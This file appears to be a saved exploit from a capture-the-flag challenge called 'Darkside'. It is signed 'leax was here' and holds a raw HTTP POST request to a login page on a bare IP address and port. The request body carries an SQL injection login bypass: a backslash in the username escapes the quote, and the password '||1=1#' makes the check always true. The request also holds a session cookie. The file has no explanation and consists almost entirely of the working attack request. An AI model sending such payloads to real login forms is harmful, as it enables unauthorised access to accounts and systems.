# Darkside
# leax was here

POST /login HTTP/1.1
Host: 52.43.208.168:1330
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://52.43.208.168:1330
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Edg/94.0.992.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://52.43.208.168:1330/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3AY3i3FLDTq0PfDXU43YAGkFR0bbyp_hfL.nNSW9Fh7DWu1eU%2BjrN%2F7x%2Fde%2B%2FYxgKTfMqyKdsNi%2FjQ
Connection: close

username=\&password=||1=1#
